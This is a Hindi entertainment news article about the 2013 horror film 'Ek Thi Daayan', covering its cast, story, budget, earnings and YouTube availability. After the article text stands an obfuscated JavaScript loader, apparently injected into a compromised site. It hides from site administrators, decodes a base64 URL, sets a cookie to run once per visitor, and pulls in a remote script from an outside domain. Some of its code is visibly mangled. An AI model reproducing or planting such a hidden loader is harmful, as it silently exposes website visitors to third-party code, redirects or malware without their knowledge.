2 घंटे 15 मिनट की वो डरावनी फिल्म, जिसको देख बज जाती है सबकी बैंड, कहानी इतनी जबरदस्त कि कभी नहीं भूलेंगे!

Reporter news indiaa :- Jasa Ram Hudda

Horror Movie In Hindi: कुछ फिल्मों की कहानी बहुत भयानक होती है. इतने ट्विस्ट होते हैं कि लोग देखते-देखते डर जाते हैं. ऐसी ही एक फिल्म साल 2013 में रिलीज हुई थी.

Horror Movie In Hindi: डरावनी फिल्मों की बात अलग है. बेशक इन फिल्मों की कहानी देख लोगों के पसीने छूट जाएं. लेकिन फिर भी वो ऐसी मूवी को देखना पसंद करते हैं. बॉलीवुड की कुछ हॉरर फिल्म के नाम तो अक्सर फैंस के मुंह से सुनने के लिए मिलते हैं. लेकिन एक बहुत डरावनी मूवी ऐसी भी है जिसके बारे में ज्यादा लोगों को पता नहीं है.

हम बात कर रह हैं फिल्म ‘एक थी डायन’ की. साल 2013 में यह फिल्म रिलीज हुई थी. लोगों की इसकी कहानी ने इतना डराया था कि वो आज तक याद करते हैं.

बॉलीवुड की सबसे हॉरर फिल्म
सुपरनेचुरल थ्रिलर फिल्म देखना पसंद करने वाले लोगों के लिए ‘एक थी डायन’ बेस्ट मूवी है. कानन अय्यर ने मूवी का डॉयरेक्शन किया था. इमरान हाश्मी, हुमा कुरैशी, कोंकणा सेन शर्मा से लेकर कल्कि कोच्लिन जैसे सितारे इस फिल्म में नजर आए थे. एकता कपूर और विशाल भारद्वाज ने मूवी को को-प्रोड्यूस किया था.

‘एक थी डायन’ मूवी की कहानी
इमरान हाशमी मूवी में जादूगर बोबो बने हैं. उनकी गर्लफ्रैंड तामारा का रोल हुमा कुरैशी ने निभाया. एक दिन अचानक जादू दिखाते-दिखाते जादूगर को आवाज सुनने को मिलती है. ये आवाज किसी और की नहीं बोबो की बहन की है. लेकिन ट्वीस्ट ये है कि उनकी बहन बचपन में ही मर गई थी. शानदार किरदार, कहानी और एक के बाद एक आने वाले ट्वीस्ट इस मूवी को बाकी फिल्मों से बहुत अलग बनाते हैं.

film ek thi daayan movie

बजट से ज्यादा की थी कमाई
फिल्मी बीट की रिपोर्ट के मुताबिक फिल्म ‘एक थी डायन’ को बनाने का बजट 24 करोड़ का था. जबकी कमाई के मामले में मूवी बहुत आगे निकली. पहले ही दिन फिल्म ने 6.24 करोड़ की कमाई की थी. मूवी की कुल कमाई लगभग 40 करोड़ के आसपास रही थी. IMDb पर इस फिल्म को 10 में से 5.7 रेटींग मिली है.

कहां देख सकते हैं आप?
इस मूवी को देखने के लिए आपको किसी भी प्लेटफॉर्म का सब्सक्रिप्शन नहीं चाहिए. आप यूट्यूब पर जाकर इस मूवी को देख सकते हैं. यूट्यूब पर मूवी को 9 मिलियन से भी ज्यादा व्यूज मिले हैं.

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Leave a Reply